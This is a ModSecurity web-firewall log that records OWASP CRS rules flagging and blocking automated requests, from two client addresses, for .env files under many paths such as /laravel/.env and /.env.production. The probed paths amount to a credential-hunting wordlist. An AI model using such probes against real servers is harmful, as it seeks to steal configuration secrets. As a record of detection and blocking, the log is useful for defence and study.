[Fri Nov 28 20:53:19.402112 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn9r6sCtNc1QXFJ-Iu0wgAAABM"]
[Fri Nov 28 20:53:19.402290 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn9r6sCtNc1QXFJ-Iu0wgAAABM"]
[Fri Nov 28 20:53:19.997834 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn9r00ytNsN5yZBlb_4KwAAABE"]
[Fri Nov 28 20:53:19.998059 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn9r00ytNsN5yZBlb_4KwAAABE"]
[Fri Nov 28 20:53:19.998266 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn9r00ytNsN5yZBlb_4KwAAABE"]
[Fri Nov 28 20:53:20.226943 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn9sKsCtNc1QXFJ-Iu0wwAAABM"]
[Fri Nov 28 20:53:20.227178 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn9sKsCtNc1QXFJ-Iu0wwAAABM"]
[Fri Nov 28 20:53:20.227369 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn9sKsCtNc1QXFJ-Iu0wwAAABM"]
[Fri Nov 28 20:53:22.357347 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xQAAABM"]
[Fri Nov 28 20:53:22.357564 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xQAAABM"]
[Fri Nov 28 20:53:22.357760 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xQAAABM"]
[Fri Nov 28 20:53:22.887182 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn9sk0ytNsN5yZBlb_4LQAAABE"]
[Fri Nov 28 20:53:22.887414 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn9sk0ytNsN5yZBlb_4LQAAABE"]
[Fri Nov 28 20:53:22.887653 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSn9sk0ytNsN5yZBlb_4LQAAABE"]
[Fri Nov 28 20:53:22.889791 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xgAAABM"]
[Fri Nov 28 20:53:22.889992 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xgAAABM"]
[Fri Nov 28 20:53:22.890166 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSn9sqsCtNc1QXFJ-Iu0xgAAABM"]
[Fri Nov 28 20:53:23.694887 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn9s-pNjqKOvIlYLfVcZAAAAAk"]
[Fri Nov 28 20:53:23.695966 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn9s-pNjqKOvIlYLfVcZAAAAAk"]
[Fri Nov 28 20:53:23.696166 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aSn9s-pNjqKOvIlYLfVcZAAAAAk"]
[Fri Nov 28 20:53:23.696774 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn9s6sCtNc1QXFJ-Iu0xwAAABM"]
[Fri Nov 28 20:53:23.696963 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn9s6sCtNc1QXFJ-Iu0xwAAABM"]
[Fri Nov 28 20:53:23.697129 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aSn9s6sCtNc1QXFJ-Iu0xwAAABM"]
[Fri Nov 28 20:53:24.391906 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn9tE0ytNsN5yZBlb_4LgAAABE"]
[Fri Nov 28 20:53:24.392245 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn9tE0ytNsN5yZBlb_4LgAAABE"]
[Fri Nov 28 20:53:24.392507 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aSn9tE0ytNsN5yZBlb_4LgAAABE"]
[Fri Nov 28 20:53:24.393412 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn9tKsCtNc1QXFJ-Iu0yAAAABM"]
[Fri Nov 28 20:53:24.393662 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn9tKsCtNc1QXFJ-Iu0yAAAABM"]
[Fri Nov 28 20:53:24.393870 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aSn9tKsCtNc1QXFJ-Iu0yAAAABM"]
[Fri Nov 28 20:53:24.650576 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn9tOpNjqKOvIlYLfVcZQAAAAk"]
[Fri Nov 28 20:53:24.650808 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn9tOpNjqKOvIlYLfVcZQAAAAk"]
[Fri Nov 28 20:53:24.650999 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aSn9tOpNjqKOvIlYLfVcZQAAAAk"]
[Fri Nov 28 20:53:25.759102 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn9tasCtNc1QXFJ-Iu0ygAAABM"]
[Fri Nov 28 20:53:25.759342 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn9tasCtNc1QXFJ-Iu0ygAAABM"]
[Fri Nov 28 20:53:25.759584 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aSn9tasCtNc1QXFJ-Iu0ygAAABM"]
[Sat Nov 29 01:24:16.320330 2025] [:error] [pid 395884] [client 3.99.142.85:38268] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSo9MECg6NYEJXEdmUt0EwAAAAg"]
[Sat Nov 29 01:24:16.320610 2025] [:error] [pid 395884] [client 3.99.142.85:38268] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSo9MECg6NYEJXEdmUt0EwAAAAg"]
[Sat Nov 29 01:24:16.320797 2025] [:error] [pid 395884] [client 3.99.142.85:38268] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSo9MECg6NYEJXEdmUt0EwAAAAg"]
[Sat Nov 29 01:24:16.432287 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aSo9MFonenFtamV5yHYc3QAAAAI"]
[Sat Nov 29 01:24:16.432403 2025] [:error] [pid 395885] [client 3.99.142.85:38272] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aSo9MCl2_ayZcB2mSooNdQAAAAk"]
